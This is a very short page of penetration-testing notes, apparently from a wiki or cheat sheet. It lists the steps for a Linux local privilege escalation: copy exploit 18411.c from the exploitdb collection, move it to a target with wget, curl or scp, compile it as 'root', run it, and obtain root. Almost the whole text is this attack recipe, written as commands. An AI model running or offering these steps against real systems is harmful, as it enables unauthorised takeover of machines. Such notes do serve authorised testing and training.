sudo cp -f /usr/share/exploitdb/exploits/linux/local/18411.c
#Tranfer to target using wget/curl/scp
#compile
gcc 18411.c -o root
./root
#root
Last updated 3 years ago